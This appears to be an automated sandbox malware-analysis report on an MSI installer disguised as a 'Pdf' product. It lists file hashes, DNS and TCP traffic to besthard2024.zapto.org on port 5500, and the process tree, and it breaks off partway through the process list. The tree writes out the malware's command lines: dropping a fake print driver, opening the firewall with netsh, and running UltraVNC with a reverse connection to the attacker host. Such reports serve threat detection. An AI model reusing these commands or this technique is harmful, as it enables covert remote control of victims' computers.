                                                                  SHA-512:6D082EEF6BAE894F35BB409A3AD6A70831C9DCA8EFA0C155951A80EFAC6A1E1BA137B7F48006742A669A33AAF0FB6722EF46E0A1391CEB9DE52F0151DD82A0BA
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):1.2102929820892037
                                                                  Encrypted:false
                                                                  SSDEEP:48:snCu7I+CFXJpT5X5qF8+MSCWAECiCyro3qMSCcT7:SC1RTqF+1ECZ
                                                                  MD5:B12429732AE359960571FA86A23280CE
                                                                  SHA1:C420AA919A2B5EA163A2BC5112135FCB2978B65A
                                                                  SHA-256:712BBFBCA15B5B5B79EDAE5776DBEFD05A87D548A2F4F4A2ED5876C3742896E9
                                                                  SHA-512:64722D69AE17E045A1865DE64B654D449962F100B2441C48F3958D8B16F4723BA77FB14AC37AB24EC73E2EFCC50B0488EBCC1B1E80E3B571BB2CF94C061FBCE3
                                                                  Malicious:false
                                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):28
                                                                  Entropy (8bit):4.208966082694623
                                                                  Encrypted:false
                                                                  SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                                                  MD5:F2CE4C29DC78D5906090690C345EAF80
                                                                  SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                                                  SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                                                  SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                                                  Malicious:false
                                                                  Preview:No Instance(s) Available....
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):41
                                                                  Entropy (8bit):4.1874503350805945
                                                                  Encrypted:false
                                                                  SSDEEP:3:OT2egJgkuLekbevn:OC39uLevn
                                                                  MD5:C80A61EC2FFEB4F20A47DF967C372762
                                                                  SHA1:D8C7166F59BB7022A966455DE5256C9A248D8B07
                                                                  SHA-256:B29385F78B29999A6E4A4133262F5AF567372A4E30C4023E20AD0899B023B76E
                                                                  SHA-512:CFB36B5FD2B5B17F9B93EC4D83286CD6F1F7B56FEC378F816055B46075386E5D9763B2435D0685410002934E74FFC94EA2E822E18C732CD5D0032856F87FAE89
                                                                  Malicious:false
                                                                  Preview:Environment variable GUID[ not defined..
                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {92C98B75-E1D1-429B-9815-3BF9C1AD8A52}, Number of Words: 10, Subject: Pdf, Author: Pdf, Name of Creating Application: Pdf (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Pdf. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 9 11:42:36 2024, Last Saved Time/Date: Wed Oct 9 11:42:36 2024, Last Printed: Wed Oct 9 11:42:36 2024, Number of Pages: 450
                                                                  Entropy (8bit):7.792563695599767
                                                                  TrID:
                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                  File name:rs8dpaIe6D.msi
                                                                  File size:7'064'064 bytes
                                                                  MD5:e21b2080c98beb0f04307a5a25630e23
                                                                  SHA1:8fc24ad51e8d61324fe8de1be667862e9238cbbb
                                                                  SHA256:0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
                                                                  SHA512:3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea
                                                                  SSDEEP:196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5
                                                                  TLSH:81661221B687C03AE5AD01B7A929EE2E163DAD770B3005D7B3E4795E1D708C1627EB43
                                                                  File Content Preview:........................>...................l...................................G.......c.......w...............................Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i..................................................................
                                                                  Icon Hash:2d2e3797b32b2b99
                                                                  TCP packets
                                                                  Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                                                  Oct 11, 2024 08:55:24.066333055 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:24.072304010 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:55:24.072540998 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:24.072711945 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:24.077510118 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:55:24.078618050 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:24.083420038 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:55:34.093501091 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:34.098510027 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:55:44.109154940 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:44.224107027 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:55:54.234389067 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:55:54.239952087 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:04.249994993 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:04.255058050 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:14.265572071 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:14.270550966 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:24.281249046 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:24.425162077 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:34.437764883 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:34.442703962 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:44.453341961 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:44.458283901 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:56:54.469027996 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:56:54.474426031 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:57:04.484658957 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:57:04.489765882 CEST  5500         49743      94.156.104.60  192.168.2.4
                                                                  Oct 11, 2024 08:57:14.500298977 CEST  49743        5500       192.168.2.4    94.156.104.60
                                                                  Oct 11, 2024 08:57:14.505139112 CEST  5500         49743      94.156.104.60  192.168.2.4

                                                                  UDP packets
                                                                  Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                                                  Oct 11, 2024 08:55:20.848329067 CEST  62508        53         192.168.2.4  1.1.1.1
                                                                  Oct 11, 2024 08:55:20.859401941 CEST  53           62508      1.1.1.1      192.168.2.4

                                                                  DNS queries
                                                                  Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class        DNS over HTTPS
                                                                  Oct 11, 2024 08:55:20.848329067 CEST  192.168.2.4  1.1.1.1  0xea10    Standard query (0)  besthard2024.zapto.org  A (IP address)  IN (0x0001)  false

                                                                  DNS answers
                                                                  Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address        Type            Class        DNS over HTTPS
                                                                  Oct 11, 2024 08:55:20.859401941 CEST  1.1.1.1    192.168.2.4  0xea10    No error (0)  besthard2024.zapto.org         94.156.104.60  A (IP address)  IN (0x0001)  false

                                                                  Target ID:0
                                                                  Start time:02:55:03
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi"
                                                                  Imagebase:0x7ff608760000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:02:55:05
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0x7ff608760000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:02:55:06
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17
                                                                  Imagebase:0xc0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:02:55:07
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\Installer\MSI4384.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                                                                  Imagebase:0x420000
                                                                  File size:428'248 bytes
                                                                  MD5 hash:432827EC55428786A447B3D848D963B7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:02:55:07
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDrivers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
                                                                  Imagebase:0x580000
                                                                  File size:412'832 bytes
                                                                  MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  • Detection: 0%, Virustotal, Browse
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x530000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x520000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic process where (name="PrintDriver.exe") get commandline
                                                                  Imagebase:0xd0000
                                                                  File size:427'008 bytes
                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:02:55:08
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /i "PrintDriver.exe"
                                                                  Imagebase:0xc20000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x530000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:02:55:16
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic process where (name="PrintDriver.exe") get commandline
                                                                  Imagebase:0xd0000
                                                                  File size:427'008 bytes
                                                                  MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:02:55:17
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /i "PrintDriver.exe"
                                                                  Imagebase:0xc20000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:02:55:19
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDriver.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
                                                                  Imagebase:0x7ff67da80000
                                                                  File size:2'912'200 bytes
                                                                  MD5 hash:27C1C264C6FCE4A5F44419F1783DB8E0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Games\PrintDriver.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 5%, ReversingLabs
                                                                  • Detection: 8%, Virustotal
                                                                  Has exited:false

                                                                  Target ID:27
                                                                  Start time:02:55:19
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:02:55:20
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:02:55:20
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:02:55:21
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:02:55:21
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0x600000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:taskkill /im rundll32.exe /f
                                                                  Imagebase:0x1e0000
                                                                  File size:74'240 bytes
                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Games\PrintDrivers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                                                                  Imagebase:0x580000
                                                                  File size:412'832 bytes
                                                                  MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:34
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:35
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:36
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\mode.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Mode 90,20
                                                                  Imagebase:0x7ff72bec0000
                                                                  File size:26'624 bytes
                                                                  MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                  Imagebase:0x520000
                                                                  File size:59'392 bytes
                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:02:55:22
                                                                  Start date:11/10/2024
